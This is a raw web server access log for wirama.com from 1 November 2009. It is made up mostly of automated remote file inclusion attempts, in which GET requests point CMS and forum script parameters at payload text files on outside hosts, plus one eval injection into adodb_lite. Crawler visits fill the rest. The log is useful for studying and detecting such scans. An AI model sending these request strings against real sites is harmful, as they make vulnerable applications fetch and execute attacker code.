67.228.191.194 - - [01/Nov/2009:02:53:30 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:30 -0800] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:30 -0800] "GET /logs/access_090801.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:32 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:32 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:32 -0800] "GET /logs/access_090801.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:38 -0800] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:49 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:49 -0800] "GET /logs/access_090801.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:50 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:02:53:50 -0800] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:03:01:41 -0800] "GET /logs/access_090731.log//html/index.php?phpbb_root_path=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:03:01:41 -0800] "GET /html/index.php?phpbb_root_path=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:03:01:41 -0800] "GET /logs//html/index.php?phpbb_root_path=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.91.8.66 - - [01/Nov/2009:03:23:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
200.91.8.66 - - [01/Nov/2009:03:23:36 -0800] "GET /skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
154.11.98.150 - - [01/Nov/2009:03:24:02 -0800] "GET /logs/access_090731.log//html/index.php?phpbb_root_path=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:03:24:02 -0800] "GET /html/index.php?phpbb_root_path=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:03:24:02 -0800] "GET /logs//html/index.php?phpbb_root_path=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.113 - - [01/Nov/2009:03:28:04 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.113 - - [01/Nov/2009:03:29:03 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.195.111.57 - - [01/Nov/2009:03:47:47 -0800] "GET /_private/?S=D HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.207.30 - - [01/Nov/2009:03:58:36 -0800] "GET /logs/ HTTP/1.1" 200 3429 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
217.147.29.44 - - [01/Nov/2009:04:11:44 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.147.29.44 - - [01/Nov/2009:04:11:51 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.147.29.44 - - [01/Nov/2009:04:11:51 -0800] "GET /logs/access_090901.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:04:22:19 -0800] "GET /logs/access_090601.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
94.198.53.208 - - [01/Nov/2009:04:22:22 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
94.198.53.208 - - [01/Nov/2009:04:22:22 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
94.198.53.208 - - [01/Nov/2009:04:22:46 -0800] "GET /logs/access_090801.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.195.111.57 - - [01/Nov/2009:04:27:30 -0800] "GET /_private/ HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
94.198.53.208 - - [01/Nov/2009:04:46:00 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:04:46:00 -0800] "GET /logs/access_090601.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:04:46:02 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:04:46:14 -0800] "GET /logs/access_090801.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [01/Nov/2009:05:02:02 -0800] "GET /logs/access_090501.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [01/Nov/2009:05:02:02 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [01/Nov/2009:05:02:02 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.249.85.67 - - [01/Nov/2009:05:15:06 -0800] "GET / HTTP/1.1" 200 916 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; feed-id=11572357192736681981)" "www.wirama.com"
65.55.207.119 - - [01/Nov/2009:05:21:49 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.119 - - [01/Nov/2009:05:23:33 -0800] "GET /pr02.htm HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
121.78.116.203 - - [01/Nov/2009:05:27:38 -0800] "GET /logs/access_090801.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:05:27:38 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:05:27:38 -0800] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:05:30:41 -0800] "GET /logs/access_090501.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.60 - - [01/Nov/2009:05:32:09 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
218.38.18.203 - - [01/Nov/2009:05:43:47 -0800] "GET /logs/access_090801.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.38.18.203 - - [01/Nov/2009:05:43:47 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.38.18.203 - - [01/Nov/2009:05:43:47 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.139 - - [01/Nov/2009:05:52:04 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.195.111.57 - - [01/Nov/2009:05:52:24 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
213.79.101.98 - - [01/Nov/2009:05:53:59 -0800] "GET /logs/access_090801.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.79.101.98 - - [01/Nov/2009:05:53:59 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.79.101.98 - - [01/Nov/2009:05:54:02 -0800] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.234.21.178 - - [01/Nov/2009:06:00:03 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
218.234.21.178 - - [01/Nov/2009:06:00:03 -0800] "GET /logs/access_090331.log%22%20target=%22_blank//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
218.234.21.178 - - [01/Nov/2009:06:00:03 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
125.245.165.135 - - [01/Nov/2009:06:01:42 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "wirama.com"
125.245.165.135 - - [01/Nov/2009:06:01:42 -0800] "GET /logs/access_090331.log%22%20target=%22_blank//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "wirama.com"
125.245.165.135 - - [01/Nov/2009:06:01:42 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "wirama.com"
67.195.111.57 - - [01/Nov/2009:06:04:38 -0800] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
67.195.111.57 - - [01/Nov/2009:06:07:12 -0800] "GET /logs/ HTTP/1.0" 200 3413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
94.198.53.208 - - [01/Nov/2009:06:10:02 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:06:10:02 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:06:10:02 -0800] "GET /logs/scripts.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.63 - - [01/Nov/2009:06:12:17 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.63 - - [01/Nov/2009:06:12:17 -0800] "GET /logs/ HTTP/1.1" 200 3429 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.195.111.57 - - [01/Nov/2009:06:14:19 -0800] "GET /logs/?N=D HTTP/1.0" 200 3413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:18:57 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:18:57 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:18:57 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:17 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:17 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:17 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:22 -0800] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:33 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:38 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:38 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:19:40 -0800] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:19:51 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:19:51 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:19:51 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:20:04 -0800] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.223.201.177 - - [01/Nov/2009:06:20:06 -0800] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:20:17 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:20:17 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:20:18 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.116.203 - - [01/Nov/2009:06:20:19 -0800] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
94.198.53.208 - - [01/Nov/2009:06:21:15 -0800] "GET /logs/access_090801.log/error.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:06:21:15 -0800] "GET /logs/error.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:06:21:17 -0800] "GET /error.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [01/Nov/2009:06:22:28 -0800] "GET /logs/access_090601.log/error.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:26:37 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:26:37 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:26:37 -0800] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:26:38 -0800] "GET /logs/access_090329.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:26:59 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:26:59 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:26:59 -0800] "GET /logs/access_090731.log/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:27:17 -0800] "GET /logs/access_090501.log/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:27:59 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:27:59 -0800] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:27:59 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [01/Nov/2009:06:28:01 -0800] "GET /logs/access_090329.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:31:42 -0800] "GET /logs//bbs//main.php?_zb_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:31:42 -0800] "GET /bbs//main.php?_zb_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:31:42 -0800] "GET /logs/access_090731.log//bbs//main.php?_zb_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:31:55 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:31:55 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:31:55 -0800] "GET /logs/access_090731.log/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:32:10 -0800] "GET /logs/access_090731.log/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:32:11 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:32:11 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:32:29 -0800] "GET /logs/access_090501.log/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
